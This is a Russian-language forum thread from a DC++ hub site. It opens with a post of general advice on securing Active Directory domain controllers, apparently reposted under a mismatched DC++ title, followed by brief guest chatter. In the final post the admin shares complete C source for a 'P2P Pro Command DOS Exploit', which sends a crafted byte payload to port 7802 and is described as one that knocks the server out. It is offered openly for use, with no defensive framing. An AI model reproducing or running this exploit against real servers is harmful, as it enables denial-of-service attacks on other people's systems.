Надежная защита DC++ - Наша DC++ - http://www.dc-hubs.info/

Надежная защита DC++

vaky

Дата: Четверг, 13.09.2007, 21:10 | Сообщение # 1

Admin и что?

Группа: Главный Администратор

Сообщений: 4403

Репутация: 48 [96%]

Статус: Offline

Пол:♂

Применив оптимальные административные процедуры, следует перенести внимание на DC, поскольку контроллеры домена — самое уязвимое место во многих AD. Если хакер взломает или нарушит работу DC, то весь лес окажется в опасности. Поэтому необходимо выполнять следующие рекомендации.

Физическая безопасность DC. Физическая безопасность контроллеров домена — одна из самых актуальных проблем AD. Злоумышленник, получивший физический доступ к DC, может обойти практически все защитные барьеры. Как правило, физической безопасности ничто не угрожает, если DC располагаются в центрах обработки данных; чаще проблема возникает в офисах филиалов. В таких офисах DC часто находятся в запертых помещениях, к которым имеет доступ только ИТ-персонал. В некоторых ситуациях подобное решение неизбежно. Но в любом случае люди, имеющие физический доступ к DC, должны пользоваться безусловным доверием.

Автоматизация процедуры назначения DC. В общем случае гораздо безопаснее автоматизировать задачу, чем решать ее вручную.

Это особенно справедливо, когда требуется построить и назначить DC. Чем больше степень автоматизации процесса построения и настройки, тем менее уязвимыми будут DC. При ручной установке серверов между различными серверами, как правило, возникают небольшие различия. Даже если процесс полностью документирован, в конфигурации серверов неизбежно появляются различия. Автоматизируя процессы построения и настройки, можно с достаточной степенью уверенности считать, что все DC идентично настроены и защищены. Обеспечить одинаковую конфигурацию ранее построенных DC можно с помощью такого инструмента, как Group Policy.

Незамедлительная установка важных программных исправлений. Во времена Windows NT большинство администраторов применяли лишь самые необходимые исправления для системы безопасности. Нередко исправления содержали ошибки и становились причиной дополнительных проблем. В настоящее время такие вольности недопустимы. К счастью, качество программных исправлений, выпускаемых Microsoft, стало гораздо выше. Контроллеры домена — очевидные мишени, поэтому администраторам необходимо уделить особое внимание новым исправлениям. Можно подписаться на рассылаемые по электронной почте извещения о новых исправлениях для системы безопасности по адресу http://www.microsoft.com/ security/bulletins/alerts.mspx. Развернуть исправления для системы безопасности можно незамедлительно с помощью Automatic Updates или протестировать и установить их выборочно с использованием службы Microsoft Software Update Services (SUS).

Резервный файл. В операционных системах, предшествующих Windows 2003, не существует способа ограничить число объектов, создаваемых в контейнере пользователем с соответствующими разрешениями. Из-за отсутствия ограничений взломщик может, непрерывно создавая объекты, заполнить жесткий диск DC. Опасность можно несколько снизить, создав на каждом DC резервный файл размером от 10 до 20 Мбайт. Если на диске DC не хватает места, можно удалить резервный файл и получить небольшую передышку до тех пор, пока не будет найден выход из положения. Создать резервный файл совсем нетрудно. Это может быть документ Microsoft Word или текстовый файл, содержащий произвольный текст.

Программы поиска вирусов. Запускать программы поиска вирусов на DC еще важнее, чем на большинстве серверов, потому что контроллеры домена обеспечивают репликацию не только информации о каталогах, но и содержимого файлов через службу File Replication Service (FRS).

К сожалению, FRS — удобный способ для распространения вирусов на большом числе серверов. А поскольку FRS обычно реплицирует сценарии регистрации, то потенциальная опасность распространяется вплоть до уровня клиентов. Использование антивирусных программ значительно снижает риск репликации вирусов на серверах и клиентах.

Бесплатная раздача 7-icq:
Получить=>

Всё на свете говно, кроме мочи, но если посмотреть, то и она говно.

Сообщение отредактировал vaky - Четверг, 13.09.2007, 21:10

Гостьcoast

Дата: Вторник, 26.08.2008, 00:38 | Сообщение # 2

Группа: Гости

Как стать оператором DC++

trepin

Дата: Вторник, 26.08.2008, 02:18 | Сообщение # 3

Группа: Гости

привет!классный сайт!так держать и незакидывать!:)

zloy

Дата: Вторник, 26.08.2008, 10:34 | Сообщение # 4

Mazafacker

Группа: Проверенные

Сообщений: 523

Репутация: 7 [14%]

Статус: Offline

Пол:♂

Quote (trepin)

привет!классный сайт!так держать и незакидывать!:)

Смелый человек - это не тот, кто ничего не боится, а тот, кто умеет преодолевать страх.

vaky

Дата: Воскресенье, 31.08.2008, 21:07 | Сообщение # 5

Admin и что?

Группа: Главный Администратор

Сообщений: 4403

Репутация: 48 [96%]

Статус: Offline

Пол:♂

Exploit EVILGMP
отрубает серв

Code

/*
    P2P Pro Command DOS Exploit
------------------------------------
Infam0us Gr0up - Securiti Research

Info: infamous.2hell.com
Vendor URL: http://www.digital-revolution.org/P2PPro.html

*/

#include <string.h>
#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char doscore[] =
"\x3f\x3f\xbc\x59\x70 "
"\x32\x70\x3f\xe1 "
"\x2b\x5c\x3f\xa6\xeb\xa6"
"\x50\x46\x2b\x5c\x3f\xa6\xeb\xa6"
"\x50\x4f\x57\x4e\x45\x44\x2e\x74"
"\x78\x74\x2b\x5c\x3f\xa6\xeb\xa6"
"\x50\x31\x32\x33\x32\x34\x32\x2e\x6b\x62";

int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET inetdos;

if (argc < 2)
{
printf(" P2P Pro Command DOS Exploit \n", argv[0]);
printf(" --------------------------------------\n", argv[0]);
printf(" Infam0us Gr0up - Securiti Research\n\n", argv[0]);
printf("[-]Usage: %s [target] [port]\n", argv[0]);
printf("[?]Exam: %s localhost 7802\n", argv[0]);
exit(1);
}

wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

target = argv[1];
port = 7802;

if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);

inetdos = socket(AF_INET, SOCK_STREAM, 0);
if(inetdos==INVALID_SOCKET)
{
printf("Socket ERROR \n");
exit(1);
}
printf(" P2P Pro Command DOS Exploit \n", argv[0]);
printf(" --------------------------------------\r\n\n", argv[0]);
printf("Resolve host... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("FAILED \n", argv[0]);
exit(1);
}
printf("[OK]\n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);

printf("[+] Connecting... ");
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("FAILED\n");
exit(1);
}
printf("[OK]\n");
printf("Target listen.. \n");
printf("Sending bad procedure... ");
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
{
printf("ERROR\n");
closesocket(inetdos);
exit(1);
}
printf("[OK]\n ");
printf("[+] Server SHUTDOWNED!\n");
closesocket(inetdos);
WSACleanup();
return 0;
}

Бесплатная раздача 7-icq:
Получить=>

Всё на свете говно, кроме мочи, но если посмотреть, то и она говно.